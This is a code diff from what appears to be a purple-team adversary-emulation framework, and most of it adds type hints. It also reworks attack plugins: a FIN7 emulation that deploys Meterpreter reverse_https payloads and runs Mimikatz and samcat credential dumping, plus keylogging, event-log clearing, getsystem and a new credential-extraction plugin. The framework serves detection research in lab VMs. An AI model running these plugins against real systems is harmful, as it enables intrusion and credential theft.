{} # System configuration. common for all plugins + self.conf: dict = {} # Plugin specific configuration + # self.sysconf = {} # System configuration. common for all plugins def teardown(self): """ Cleanup afterwards """ pass # pylint: disable=unnecessary-pass - def run(self, targets): + def run(self, targets: list[str]): """ Run the command @param targets: A list of targets, ip addresses will do """ raise NotImplementedError - def __execute__(self, targets): + def __execute__(self, targets: list[str]) -> str: """ Execute the plugin. This is called by the code @param targets: A list of targets, ip addresses will do diff --git a/plugins/base/machinery.py b/plugins/base/machinery.py index 5849bd3..301f616 100644 --- a/plugins/base/machinery.py +++ b/plugins/base/machinery.py @@ -4,6 +4,7 @@ from enum import Enum import os +from typing import Optional from app.config import MachineConfig from app.interface_sfx import CommandlineColors from plugins.base.plugin_base import BasePlugin @@ -26,9 +27,9 @@ class MachineryPlugin(BasePlugin): """ Class to control virtual machines, vagrant, .... """ # Boilerplate - name = None + name: Optional[str] = None - required_files = [] + required_files: list[str] = [] ############### # This is stuff you might want to implement @@ -38,7 +39,7 @@ class MachineryPlugin(BasePlugin): self.connection = None # Connection self.config = None - def create(self, reboot=True): + def create(self, reboot: bool = True): """ Create a machine @param reboot: Optionally reboot the machine after creation @@ -61,7 +62,7 @@ class MachineryPlugin(BasePlugin): """ Connect to a machine """ raise NotImplementedError - def remote_run(self, cmd, disown=False): + def remote_run(self, cmd: str, disown: bool = False): """ Connects to the machine and runs a command there @@ -75,7 +76,7 @@ class MachineryPlugin(BasePlugin): """ Disconnect from a machine """ raise NotImplementedError - def put(self, src, dst): + def put(self, src: str, dst: str): """ Send a file to a machine @param src: source dir @@ -83,7 +84,7 @@ class MachineryPlugin(BasePlugin): """ raise NotImplementedError - def get(self, src, dst): + def get(self, src: str, dst: str): """ Get a file to a machine @param src: source dir @@ -108,8 +109,11 @@ class MachineryPlugin(BasePlugin): return self.config.get_playground() - def get_vm_name(self): - """ Get the specific name of the machine """ + def get_vm_name(self) -> str: + """ Get the specific name of the machine + + @returns: the machine name + """ return self.config.vmname() @@ -140,7 +144,7 @@ class MachineryPlugin(BasePlugin): self.config = config self.process_config(config.raw_config) - def __call_remote_run__(self, cmd, disown=False): + def __call_remote_run__(self, cmd: str, disown: bool = False): """ Simplifies connect and run @param cmd: Command to run as shell command @@ -164,7 +168,7 @@ class MachineryPlugin(BasePlugin): self.up() - def __call_create__(self, reboot=True): + def __call_create__(self, reboot: bool = True): """ Create a VM @param reboot: Reboot the VM during installation. Required if you want to install software diff --git a/plugins/base/plugin_base.py b/plugins/base/plugin_base.py index b18ae32..75c9f27 100644 --- a/plugins/base/plugin_base.py +++ b/plugins/base/plugin_base.py @@ -2,26 +2,27 @@ """ Base class for all plugin types """ import os +from typing import Optional import yaml -# from shutil import copy -from app.exceptions import PluginError -import app.exceptions +from app.exceptions import PluginError # type: ignore +import app.exceptions # type: ignore + class BasePlugin(): """ Base class for plugins """ - required_files = None # a list of files shipped with the plugin to be installed - name = None # The name of the plugin - alternative_names = [] # The is an optional list of alternative names - description = None # The description of this plugin + required_files: list[str] = [] # a list of files shipped with the plugin to be installed + name: str = "" # The name of the plugin + alternative_names: list[str] = [] # The is an optional list of alternative names + description: Optional[str] = None # The description of this plugin - def __init__(self): + def __init__(self) -> None: # self.machine = None - self.plugin_path = None + self.plugin_path: Optional[str] = None self.machine_plugin = None - self.sysconf = {} - self.conf = {} + # self.sysconf = {} + self.conf: dict = {} self.attack_logger = None self.default_config_name = "default_config.yaml" @@ -81,7 +82,7 @@ class BasePlugin(): # self.sysconf["abs_machinepath_external"] = config["abs_machinepath_external"] self.load_default_config() - def process_config(self, config): + def process_config(self, config: dict): """ process config and use defaults if stuff is missing @param config: The config dict @@ -91,7 +92,7 @@ class BasePlugin(): self.conf = {**self.conf, **config} - def copy_to_machine(self, filename): + def copy_to_machine(self, filename: str): """ Copies a file shipped with the plugin to the machine share folder @param filename: File from the plugin folder to copy to the machine share. @@ -99,12 +100,17 @@ class BasePlugin(): if self.machine_plugin is not None: self.machine_plugin.put(filename, self.machine_plugin.get_playground()) + else: + raise PluginError("Missing machine") - def get_from_machine(self, src, dst): + def get_from_machine(self, src: str, dst: str): """ Get a file from the machine """ - self.machine_plugin.get(src, dst) # nosec + if self.machine_plugin is not None: + self.machine_plugin.get(src, dst) # nosec + else: + raise PluginError("Missing machine") - def run_cmd(self, command, disown=False): + def run_cmd(self, command: str, disown: bool = False): """ Execute a command on the vm using the connection @param command: Command to execute @@ -126,7 +132,7 @@ class BasePlugin(): raise NotImplementedError - def get_names(self) -> []: + def get_names(self) -> list[str]: """ Adds the name of the plugin to the alternative names and returns the list """ res = set() @@ -183,20 +189,20 @@ class BasePlugin(): if self.conf is None: self.conf = {} - def get_config_section_name(self): + def get_config_section_name(self) -> str: """ Returns the name for the config sub-section to use for this plugin. Defaults to the name of the plugin. This method should be overwritten if it gets more complicated """ return self.get_name() - def main_path(self): # pylint:disable=no-self-use + def main_path(self) -> str: # pylint:disable=no-self-use """ Returns the main path of the Purple Dome installation """ app_dir = os.path.dirname(app.exceptions.__file__) return os.path.split(app_dir)[0] - def vprint(self, text, verbosity): + def vprint(self, text: str, verbosity: int): """ verbosity based stdout printing 0: Errors only @@ -207,5 +213,5 @@ class BasePlugin(): @param text: The text to print @param verbosity: the verbosity level the text has. """ - - self.attack_logger.vprint(text, verbosity) + if self.attack_logger is not None: + self.attack_logger.vprint(text, verbosity) diff --git a/plugins/base/sensor.py b/plugins/base/sensor.py index 1f53e74..684ae61 100644 --- a/plugins/base/sensor.py +++ b/plugins/base/sensor.py @@ -2,9 +2,11 @@ """ A base plugin class for sensors. Anything installed on the target to collect system information and identify the attack """ import os +from typing import Optional from plugins.base.plugin_base import BasePlugin + class SensorPlugin(BasePlugin): """ A sensor will be running on the target machine and monitor attacks. To remote control those sensors there are sensor plugins. This is the base class for them @@ -12,28 +14,28 @@ class SensorPlugin(BasePlugin): """ # Boilerplate - name = None + name: Optional[str] = None - required_files = [] + required_files: list[str] = [] def __init__(self): super().__init__() # pylint:disable=useless-super-delegation self.debugit = False - def prime(self): # pylint: disable=no-self-use + def prime(self) -> bool: # pylint: disable=no-self-use """ prime sets hard core configs in the target. You can use it to call everything that permanently alters the OS by settings. If your prime function returns True the machine will be rebooted after prime-ing it. This is very likely what you want. Only use prime if install is not sufficient. """ return False - def install(self): # pylint: disable=no-self-use + def install(self) -> bool: # pylint: disable=no-self-use """ Install the sensor. Executed on the target. Take the sensor from the share and (maybe) copy it to its destination. Do some setup """ return True - def start(self, disown=None): # pylint: disable=unused-argument, no-self-use + def start(self, disown=None) -> bool: # pylint: disable=unused-argument, no-self-use """ Start the sensor. The connection to the client is disowned here. = Sent to background. This keeps the process running. @param disown: Send async into background @@ -41,22 +43,22 @@ class SensorPlugin(BasePlugin): return True - def stop(self): # pylint: disable=no-self-use + def stop(self) -> bool: # pylint: disable=no-self-use """ Stop the sensor """ return True - def __call_collect__(self, machine_path): + def __call_collect__(self, machine_path: str): """ Generate the data collect command @param machine_path: Machine specific path to collect data into """ - path = os.path.join(machine_path, "sensors", self.name) + path = os.path.join(machine_path, "sensors", self.name) # type: ignore os.makedirs(path) return self.collect(path) - def collect(self, path) -> []: + def collect(self, path: str) -> list[str]: """ Collect data from sensor. Copy it from sensor collection dir on target OS to the share @param path: The path to copy the data into diff --git a/plugins/base/ssh_features.py b/plugins/base/ssh_features.py index 45c9e0a..013c4c0 100644 --- a/plugins/base/ssh_features.py +++ b/plugins/base/ssh_features.py @@ -62,7 +62,7 @@ class SSHFeatures(BasePlugin): self.vprint("SSH network error", 0) raise NetworkError - def remote_run(self, cmd, disown=False): + def remote_run(self, cmd: str, disown: bool = False): """ Connects to the machine and runs a command there @param cmd: The command to execute @@ -109,7 +109,7 @@ class SSHFeatures(BasePlugin): return "" - def put(self, src, dst): + def put(self, src: str, dst: str): """ Send a file to a machine @param src: source dir @@ -148,7 +148,7 @@ class SSHFeatures(BasePlugin): self.vprint("SSH network error on PUT command", 0) raise NetworkError - def get(self, src, dst): + def get(self, src: str, dst: str): """ Get a file to a machine @param src: source dir diff --git a/plugins/base/vulnerability_plugin.py b/plugins/base/vulnerability_plugin.py index 277cf93..67346d5 100644 --- a/plugins/base/vulnerability_plugin.py +++ b/plugins/base/vulnerability_plugin.py @@ -2,6 +2,7 @@ """ This is a specific plugin type that installs a vulnerability into a VM. This can be a vulnerable application or a configuration setting """ +from typing import Optional from plugins.base.plugin_base import BasePlugin @@ -10,12 +11,12 @@ class VulnerabilityPlugin(BasePlugin): """ # Boilerplate - name = None - description = None - ttp = None + name: Optional[str] = None + description: Optional[str] = None + ttp: Optional[str] = None references = None - required_files = [] + required_files: list[str] = [] def __init__(self): super().__init__() # pylint:disable=useless-super-delegation diff --git a/plugins/default/adversary_emulations/FIN7/fin7_section1.py b/plugins/default/adversary_emulations/FIN7/fin7_section1.py index 487f9a2..3feb14a 100644 --- a/plugins/default/adversary_emulations/FIN7/fin7_section1.py +++ b/plugins/default/adversary_emulations/FIN7/fin7_section1.py @@ -1,10 +1,11 @@ #!/usr/bin/env python3 # Adversary emulation for FIN7 +import socket -from plugins.base.attack import AttackPlugin +from plugins.base.attack import AttackPlugin, Requirement from app.interface_sfx import CommandlineColors -from app.metasploit import MSFVenom, MetasploitInstant +from app.metasploit import MSFVenom import os import time @@ -19,6 +20,8 @@ class FIN7Plugin(AttackPlugin): required_files_attacker = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.CALDERA, Requirement.METASPLOIT] + ###### payload_type_1 = "windows/x64/meterpreter/reverse_https" # payload for initial stage @@ -27,21 +30,24 @@ class FIN7Plugin(AttackPlugin): self.plugin_path = __file__ self.metasploit_1 = None - def get_metasploit_1(self): - """ Returns a metasploit with a session for the first targeted machine """ - if self.metasploit_1: - return self.metasploit_1 + def get_metasploit_1(self, payload): + """ Returns a metasploit with a session for the first targeted machine + + @param payload: payload description. waiting for this payload. Like "windows/x64/meterpreter/reverse_https" + """ + if self.metasploit: + return self.metasploit + + self.connect_metasploit() - self.metasploit_1 = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user) - self.metasploit_1.start_exploit_stub_for_external_payload(payload=self.payload_type_1) - self.metasploit_1.wait_for_session() - return self.metasploit_1 + ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) + self.metasploit.start_exploit_stub_for_external_payload(payload=self.payload_type_1, lhost=ip) + self.metasploit.wait_for_session() + return self.metasploit def step1(self): self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Step 1 (target hotelmanager): Initial Breach{CommandlineColors.ENDC}", 1) - - self.attack_logger.start_narration( - "Step 1 (target hotelmanager): Initial Breach\n----------------------------") + self.attack_logger.start_attack_step("Step 1 (target hotelmanager): Initial Breach") self.attack_logger.start_narration(""" NOT IMPLEMENTED YET @@ -68,8 +74,7 @@ This is the initial attack step that requires user interaction. Maybe it is bett def step2(self): self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Step 2 (target hotelmanager): Delayed Malware Execution{CommandlineColors.ENDC}", 1) - self.attack_logger.start_narration( - "Step 2 (target hotelmanager): Delayed Malware Execution\n----------------------------") + self.attack_logger.start_attack_step("Step 2 (target hotelmanager): Delayed Malware Execution") self.attack_logger.start_narration(""" NOT IMPLEMENTED YET @@ -92,7 +97,7 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic def step3(self): self.attack_logger.vprint( f"{CommandlineColors.OKBLUE}Step 3 (target hotelmanager): Target Assessment{CommandlineColors.ENDC}", 1) - self.attack_logger.start_narration("Step 3 (target hotelmanager): Target Assessment\n----------------------------") + self.attack_logger.start_attack_step("Step 3 (target hotelmanager): Target Assessment") # TODO: Make sure logging is nice and complete @@ -179,7 +184,6 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic # Generate shellcode # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=443 EXITFUNC=thread -f C --encrypt xor --encrypt-key m - dl_uri = "https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step4/babymetal/babymetal.cpp" architecture = "x64" target_platform = "windows" @@ -238,7 +242,7 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic # base64 conversion self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_4; base64 babymetal.bin > {encoded_filename}") - self.attack_logger.stop_build(logid = logid) + self.attack_logger.stop_build(logid=logid) self.attack_logger.vprint( f"{CommandlineColors.OKGREEN}Step 4 compiling tools{CommandlineColors.ENDC}", 1) @@ -250,8 +254,7 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic """ self.attack_logger.vprint( f"{CommandlineColors.OKBLUE}Step 4 (target hotelmanager): Staging Interactive Toolkit{CommandlineColors.ENDC}", 1) - self.attack_logger.start_narration( - "Step 4 (target hotelmanager): Staging Interactive Toolkit\n----------------------------") + self.attack_logger.start_attack_step("Step 4 (target hotelmanager): Staging Interactive Toolkit") self.attack_logger.start_narration(""" In the original attack Babymetal payload is a dll. Currently we are using a simplification here (directly calling a exe). The original steps are: * Target already runs adb156.exe. This one gets the shellcode over the network connection and decodes it. @@ -271,8 +274,10 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp # TODO: Babymetal payload is a dll. Currently we are using a simplification here (exe). Implement the proper steps. + payload = self.payload_type_1 + venom = MSFVenom(self.attacker_machine_plugin, hotelmanager, self.attack_logger) - venom.generate_and_deploy(payload=self.payload_type_1, + venom.generate_and_deploy(payload=payload, architecture="x64", platform="windows", lhost=self.attacker_machine_plugin.get_ip(), @@ -288,9 +293,10 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp # TODO: invoke-Shellcode.ps1 loads shellcode into powershell.exe memory (Allocate memory, copy shellcode, start thread) (received from C2 server) https://attack.mitre.org/techniques/T1573/ # https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin7/Resources/Step4/babymetal/Invoke-Shellcode.ps1 - # metasploit1 = self.get_metasploit_1() - # print("Got session, calling command") - # print(metasploit.meterpreter_execute_on(["getuid"], hotelmanager)) + metasploit1 = self.get_metasploit_1(payload) + print("Got session, calling command") + print(metasploit1.meterpreter_execute_on(["getuid"], hotelmanager)) + print("Should have called session now") self.attack_logger.vprint( f"{CommandlineColors.OKGREEN}End Step 4: Staging Interactive Toolkit{CommandlineColors.ENDC}", 1) @@ -298,13 +304,14 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp def step5(self): self.attack_logger.vprint( f"{CommandlineColors.OKBLUE}Step 5 (target hotelmanager): Escalate Privileges{CommandlineColors.ENDC}", 1) - self.attack_logger.start_narration( - "Step 5 (target hotelmanager): Escalate Privileges\n----------------------------") + self.attack_logger.start_attack_step("Step 5 (target hotelmanager): Escalate Privileges") hotelmanager = self.get_target_by_name("hotelmanager") + payload = self.payload_type_1 + # This is meterpreter ! - metasploit = self.get_metasploit_1() + metasploit = self.get_metasploit_1(payload) # powershell -> CreateToolHelp32Snapshot() for process discovery (Caldera alternative ?) https://attack.mitre.org/techniques/T1057/ self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}Execute ps -ax through meterpreter{CommandlineColors.ENDC}", 1) @@ -379,12 +386,14 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp situation_description="Executing Mimikatz through UAC bypassing powershell", countermeasure="Behaviour detection" ) - print(metasploit.meterpreter_execute_on([execute_samcats], hotelmanager, delay=20)) + result = metasploit.meterpreter_execute_on([execute_samcats], hotelmanager, delay=20) + print(result) self.attack_logger.stop_metasploit_attack(source=self.attacker_machine_plugin.get_ip(), target=hotelmanager.get_ip(), metasploit_command=execute_samcats, ttp="T1003", - logid=logid) + logid=logid, + result=result) # samcat.exe: reads local credentials https://attack.mitre.org/techniques/T1003/001/ @@ -472,8 +481,7 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp def step6(self): self.attack_logger.vprint( f"{CommandlineColors.OKBLUE}Step 6 (target hotelmanager -> itadmin): Expand Access{CommandlineColors.ENDC}", 1) - self.attack_logger.start_narration( - "Step 6 (target hotelmanager and itadmin): Expand Access\n----------------------------") + self.attack_logger.start_attack_step("Step 6 (target hotelmanager and itadmin): Expand Access") self.attack_logger.start_narration(""" NOT IMPLEMENTED YET. NEEDS A SECOND MACHINE FOR LATERAL MOVEMENT * powershell download: paexec.exe and hollow.exe https://attack.mitre.org/techniques/T1105/ @@ -534,8 +542,7 @@ NOT IMPLEMENTED YET. NEEDS A SECOND MACHINE FOR LATERAL MOVEMENT def step7(self): self.attack_logger.vprint( f"{CommandlineColors.OKBLUE}Step 7 on itadmin: Setup User Monitoring{CommandlineColors.ENDC}", 1) - self.attack_logger.start_narration( - "Step 7 (target itadmin): Setup User Monitoring\n----------------------------") + self.attack_logger.start_attack_step("Step 7 (target itadmin): Setup User Monitoring") self.attack_logger.start_narration(""" NOT IMPLEMENTED YET. A REPLACEMENT FOR THE ALOHA COMMAND CENTER IS NEEDED @@ -570,8 +577,7 @@ NOT IMPLEMENTED YET. A REPLACEMENT FOR THE ALOHA COMMAND CENTER IS NEEDED def step8(self): self.attack_logger.vprint( f"{CommandlineColors.OKBLUE}Step 8 (target: itadmin as domain_admin): User Monitoring{CommandlineColors.ENDC}", 1) - self.attack_logger.start_narration( - "Step 8 (target itadmin): User Monitoring\n----------------------------") + self.attack_logger.start_attack_step("Step 8 (target itadmin): User Monitoring") self.attack_logger.start_narration(""" NOT IMPLEMENTED YET. MAYBE DO THIS PARTIAL. KEYLOGGING NEEDS USER INTERACTION. (Screen spying and keylogging are already implemented as standalone metasploit attacks. Use them) @@ -622,7 +628,7 @@ NOT IMPLEMENTED YET. MAYBE DO THIS PARTIAL. KEYLOGGING NEEDS USER INTERACTION. lport=lport, filename=filename, for_step=for_step, - sRDI_conversion= sRDI_conversion, + sRDI_conversion=sRDI_conversion, encoded_filename=encoded_filename, comment="And SRDI converted Meterpreter shell. Will be stored in the registry.") @@ -691,8 +697,7 @@ NOT IMPLEMENTED YET. MAYBE DO THIS PARTIAL. KEYLOGGING NEEDS USER INTERACTION. def step9(self): self.attack_logger.vprint( f"{CommandlineColors.OKBLUE}Step 9 (target: accounting): Setup Shim Persistence{CommandlineColors.ENDC}", 1) - self.attack_logger.start_narration( - "Step 9 (target accounting): Setup Shim Persistence\n----------------------------") + self.attack_logger.start_attack_step("Step 9 (target accounting): Setup Shim Persistence") self.attack_logger.start_narration(""" NOT IMPLEMENTED YET @@ -730,11 +735,11 @@ NOT IMPLEMENTED YET filename = "AccountingIQ.exe" dl_uri = "https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step10/AccountingIQ.c" - logid = self.attack_logger.start_build( - filename=filename, + logid = self.attack_logger.start_build(filename=filename, for_step=10, dl_uri=dl_uri, - comment="This is a simulated credit card tool to target. The final flag is in here.") + comment="This is a simulated credit card tool to target. The final flag is in here." + ) # simulated credit card tool as target self.attacker_machine_plugin.remote_run("mkdir tool_factory/step_10") # MSFVenom needs to be installed self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_10; rm {filename}") @@ -782,8 +787,7 @@ NOT IMPLEMENTED YET self.attack_logger.vprint( f"{CommandlineColors.OKBLUE}Step 10 (target: accounting): Steal Payment Data{CommandlineColors.ENDC}", 1) - self.attack_logger.start_narration( - "Step 10 (target accounting): Steal Payment Data\n----------------------------") + self.attack_logger.start_attack_step("Step 10 (target accounting): Steal Payment Data") self.attack_logger.start_narration(""" NOT IMPLEMENTED YET. NEEDS TARGET REBOOTING: NO IDEA IF ATTACKX CAN SUPPORT THAT diff --git a/plugins/default/metasploit_attacks/metasploit_arp_t1016/metasploit_arp.py b/plugins/default/metasploit_attacks/metasploit_arp_t1016/metasploit_arp.py index 56d1883..781f30d 100644 --- a/plugins/default/metasploit_attacks/metasploit_arp_t1016/metasploit_arp.py +++ b/plugins/default/metasploit_attacks/metasploit_arp_t1016/metasploit_arp.py @@ -2,8 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin -from app.metasploit import MetasploitInstant +from plugins.base.attack import AttackPlugin, Requirement class MetasploitArpPlugin(AttackPlugin): @@ -15,6 +14,7 @@ class MetasploitArpPlugin(AttackPlugin): references = ["https://attack.mitre.org/techniques/T1016/"] required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] def __init__(self): super().__init__() @@ -31,13 +31,14 @@ class MetasploitArpPlugin(AttackPlugin): payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) + # self.connect_metasploit() - metasploit.smart_infect(target, payload_type, payload_name, ) + self.metasploit.smart_infect(target, + payload=payload_type, + outfile=payload_name, + format="exe", + architecture="x64") - metasploit.arp_network_discovery(target) + self.metasploit.arp_network_discovery(target) return res diff --git a/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py b/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py index e3fb0d0..c5b87be 100644 --- a/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py +++ b/plugins/default/metasploit_attacks/metasploit_clearev_t1070/metasploit_clearev_t1070.py @@ -2,8 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin -from app.metasploit import MetasploitInstant +from plugins.base.attack import AttackPlugin, Requirement class MetasploitClearevPlugin(AttackPlugin): @@ -16,6 +15,8 @@ class MetasploitClearevPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -27,17 +28,16 @@ class MetasploitClearevPlugin(AttackPlugin): """ res = "" - payload_type = "windows/meterpreter_reverse_https" + payload_type = "windows/x64/meterpreter/reverse_https" payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - - metasploit.smart_infect(target, payload_type, payload_name, ) + self.metasploit.smart_infect(target, + payload=payload_type, + outfile=payload_name, + format="exe", + architecture="x64") - metasploit.clearev(target) + self.metasploit.clearev(target) return res diff --git a/plugins/default/metasploit_attacks/metasploit_getsystem/default_config.yaml b/plugins/default/metasploit_attacks/metasploit_getsystem/default_config.yaml new file mode 100644 index 0000000..96e3948 --- /dev/null +++ b/plugins/default/metasploit_attacks/metasploit_getsystem/default_config.yaml @@ -0,0 +1,8 @@ +### +# The getsystem variant to use. +# See: https://docs.rapid7.com/metasploit/meterpreter-getsystem/ +# 0: auto +# 1: Named Pipe Impersonation (In Memory/Admin) +# 2: Named Pipe Impersonation (Dropper/Admin) +# 3: Token Duplication (In Memory/Admin) +variant: 0 \ No newline at end of file diff --git a/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py b/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py index 8fa6687..c7621c2 100644 --- a/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py +++ b/plugins/default/metasploit_attacks/metasploit_getsystem/metasploit_getsystem.py @@ -2,8 +2,8 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin -from app.metasploit import MetasploitInstant +from plugins.base.attack import AttackPlugin, Requirement +import socket class MetasploitGetsystemPlugin(AttackPlugin): @@ -16,6 +16,8 @@ class MetasploitGetsystemPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -28,20 +30,26 @@ class MetasploitGetsystemPlugin(AttackPlugin): self.attack_logger.start_narration("A metasploit command like that is used to get system privileges for the next attack step.") res = "" - payload_type = "windows/meterpreter/reverse_https" + payload_type = "windows/x64/meterpreter/reverse_https" payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) + ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip()) + + self.metasploit.smart_infect(target, + payload=payload_type, + architecture="x64", + platform="windows", + lhost=ip, + format="exe", + outfile=payload_name) - metasploit.smart_infect(target, payload_type, payload_name, ) + # TODO: https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70 - metasploit.getsystem(target, - situation_description="This is an example standalone attack step. In real world attacks there would be events before and after", - countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection." - ) + self.metasploit.getsystem(target, + variant=self.conf['variant'], + situation_description="This is an example standalone attack step. In real world attacks there would be events before and after", + countermeasure="Observe how pipes are used. Take steps before (gaining access) and after (abusing those new privileges) into account for detection." + ) return res diff --git a/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py b/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py index f83e7bc..7d9bb38 100644 --- a/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py +++ b/plugins/default/metasploit_attacks/metasploit_getuid_t1033/metasploit_getuid.py @@ -2,8 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin -from app.metasploit import MetasploitInstant +from plugins.base.attack import AttackPlugin, Requirement class MetasploitGetuidPlugin(AttackPlugin): @@ -16,6 +15,8 @@ class MetasploitGetuidPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -27,18 +28,17 @@ class MetasploitGetuidPlugin(AttackPlugin): """ res = "" - payload_type = "windows/meterpreter_reverse_https" + payload_type = "windows/x64/meterpreter/reverse_https" payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - - metasploit.smart_infect(target, payload_type, payload_name, ) + self.metasploit.smart_infect(target, + payload=payload_type, + outfile=payload_name, + format="exe", + architecture="x64") - uid = metasploit.getuid(target) + uid = self.metasploit.getuid(target) print(f"UID: {uid}") return res diff --git a/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py b/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py index 7278f32..8e90437 100644 --- a/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py +++ b/plugins/default/metasploit_attacks/metasploit_keylogging_T1056/metasploit_keylogging.py @@ -2,8 +2,7 @@ # A plugin to nmap targets slow motion, to evade sensors -from plugins.base.attack import AttackPlugin -from app.metasploit import MetasploitInstant +from plugins.base.attack import AttackPlugin, Requirement class MetasploitKeyloggingPlugin(AttackPlugin): @@ -16,6 +15,8 @@ class MetasploitKeyloggingPlugin(AttackPlugin): required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + requirements = [Requirement.METASPLOIT] + def __init__(self): super().__init__() self.plugin_path = __file__ @@ -27,19 +28,18 @@ class MetasploitKeyloggingPlugin(AttackPlugin): """ res = "" - payload_type = "windows/meterpreter_reverse_https" + payload_type = "windows/x64/meterpreter/reverse_https" payload_name = "babymetal.exe" target = self.targets[0] - metasploit = MetasploitInstant(self.metasploit_password, - attack_logger=self.attack_logger, - attacker=self.attacker_machine_plugin, - username=self.metasploit_user) - - metasploit.smart_infect(target, payload_type, payload_name, ) + self.metasploit.smart_infect(target, + payload=payload_type, + outfile=payload_name, + format="exe", + architecture="x64") - metasploit.migrate(target, name="winlogon.exe") + self.metasploit.migrate(target, name="winlogon.exe") - metasploit.keylogging(target, monitoring_time=20) + self.metasploit.keylogging(target, monitoring_time=20) return res diff --git a/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/default_config.yaml b/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/default_config.yaml new file mode 100644 index 0000000..1f56f06 --- /dev/null +++ b/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/default_config.yaml @@ -0,0 +1,5 @@ +### +# The kiwi command to use. +# See: https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz +# Some options: creds_all, creds_kerberos, creds msv, creds_ssp, creds_tspkg, creds_wdigest, wifi_list, wifi_list_shared +variant: creds_all \ No newline at end of file diff --git a/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/metasploit_kiwi_t1003.py b/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/metasploit_kiwi_t1003.py new file mode 100644 index 0000000..1c3793d --- /dev/null +++ b/plugins/default/metasploit_attacks/metasploit_kiwi_t1003/metasploit_kiwi_t1003.py @@ -0,0 +1,53 @@ +#!/usr/bin/env python3 + +# A plugin to nmap targets slow motion, to evade sensors + +from plugins.base.attack import AttackPlugin, Requirement +import socket + + +class MetasploitKiwiPlugin(AttackPlugin): + + # Boilerplate + name = "metasploit_kiwi" + description = "Extract credentials from memory. Kiwi is the more modern Mimikatz" + ttp = "t1003" + references = ["https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz"] + + required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share + + requirements = [Requirement.METASPLOIT] + + def __init__(self): + super().__init__() + self.plugin_path = __file__ + + def run(self, targets): + """ Run the command + + @param targets: A list of targets, ip addresses will do + """ + + self.attack_logger.start_narration("Extracting user credentials from memory.") + res = 